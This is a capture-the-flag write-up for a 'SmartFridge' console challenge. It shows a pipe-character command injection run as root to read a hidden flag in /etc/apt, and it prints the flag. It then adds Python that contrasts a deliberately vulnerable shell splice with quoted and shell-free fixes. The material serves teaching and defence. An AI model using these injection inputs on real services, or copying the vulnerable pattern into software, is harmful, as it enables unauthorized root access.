Fridge (Smart Home, 200p)

Your mom brings in a package, in which you find a large amount of soda.
In the package there is also a letter.
The letter reads that the smart fridge sent out the order to restock itself.
You are certain that you have not ordered the products, and neither has your family.
Access your smart fridge management console to investigate what is happening.
Connect to: envXXX.target03
Port: 2333
The answer can be found in the /etc/apt/ folder

Solution

Connecting to the target shows a welcome message from "SmartFridge Digital!" and a prompt for a password.

# nc envXXX.target03 2333

*******************************************
*                                         *
* Welcome to SmartFridge Digital!         *
* Please provide password to continue     *
*                                         *
*                                         *
*******************************************
*                                         *
*                               ********  *
*                               * 1234 *  *
*                               ********  *
*                                         *
*       **                                *
*       **                                *
*       **                                *
*       **                                *
*                                         *
*                                         *
*                                         *
*                                         *
*                                         *
*                                         *
*                                         *
*******************************************
-> 1. Enable internal camera              *
-> 2. Order food from local store         *
-> 3. Power saving options                *
-> 4. Configuration settings              *
-> To disconnect enter command 'quit'     *
*******************************************

Trying various default passwords returns the same answer each time.

1234
Wrong input (not authorized): '1234'
test
Wrong input (not authorized): 'test'

Trying all special characters returns interesting output on the | (pipe) character.

|
Fridge is self-aware! Error: 0x0 dumping stack trace: ' .  . '

A pipe character being treated specially usually indicates command injection: the input is passed to a shell unescaped. Trying it confirms that commands run as root, so retrieve the flag.

|id
Fridge is self-aware! Error: 0x0 dumping stack trace: ' . uid=0(root) gid=0(root) groups=0(root)
 . '
|ls -al /etc/apt
Fridge is self-aware! Error: 0x0 dumping stack trace: ' . total 36
drwxr-xr-x 1 root root 4096 Sep 12 11:43 .
drwxr-xr-x 1 root root 4096 Sep 12 11:43 ..
-rw-r--r-- 1 root root   30 Sep 12 11:43 .flag.txt
drwxr-xr-x 2 root root 4096 Dec 10  2020 apt.conf.d
drwxr-xr-x 2 root root 4096 May 12  2020 auth.conf.d
drwxr-xr-x 1 root root 4096 Dec 11  2020 preferences.d
-rw-r--r-- 1 root root  421 Dec 10  2020 sources.list
drwxr-xr-x 2 root root 4096 May 12  2020 sources.list.d
drwxr-xr-x 2 root root 4096 Dec 10  2020 trusted.gpg.d
 . '
|cat /etc/apt/.flag.txt
Fridge is self-aware! Error: 0x0 dumping stack trace: ' . Flag: ctf-tech{2deb997d-1f67}

Flag is ctf-tech{2deb997d-1f67}.
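Added illustration, not the challenge's own code (which is not available): the Python below shows the splicing pattern that makes a bare | start a second pipeline stage, tokenises the resulting command the way sh would, and contrasts it with two fixes, quoting via shlex.quote and, better, a check that never touches a shell. The checker path /opt/fridge/check_pw and the password are constructed for the example.

```python
import hashlib
import hmac
import shlex

# Constructed stand-in for the stored credential (not from the challenge).
STORED_SHA256 = hashlib.sha256(b"correct-horse").hexdigest()


def vulnerable_command(user_input: str) -> str:
    """Shell string an unsafe handler would hand to `sh -c`.
    The input is spliced in raw, so '|id' becomes its own pipeline stage
    that runs with the service's privileges (root, in the writeup)."""
    return f"echo {user_input} | /opt/fridge/check_pw"


def quoted_command(user_input: str) -> str:
    """Same command with shlex.quote applied: metacharacters stay inside
    a single-quoted argument and never reach the shell's grammar."""
    return f"echo {shlex.quote(user_input)} | /opt/fridge/check_pw"


def shell_would_split(cmd: str) -> list[str]:
    """Tokenise `cmd` like a POSIX shell (punctuation_chars makes '|'
    a separate token). An injected pipe shows up as its own token; a
    quoted one stays embedded in the argument."""
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    return list(lexer)


def check_password(user_input: str) -> bool:
    """Hardened check: no subprocess, no shell, constant-time comparison
    of hashes so neither metacharacters nor timing leak anything."""
    candidate = hashlib.sha256(user_input.encode()).hexdigest()
    return hmac.compare_digest(candidate, STORED_SHA256)


if __name__ == "__main__":
    for label, cmd in (("vulnerable", vulnerable_command("|id")),
                       ("quoted", quoted_command("|id"))):
        print(f"{label:10s} {cmd!r} -> {shell_would_split(cmd)}")
    print("hardened   accepts '|id'?", check_password("|id"))
```

The tokenised output makes the difference visible: the raw splice yields a standalone "|" followed by "id", while the quoted form keeps "|id" as one harmless argument.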
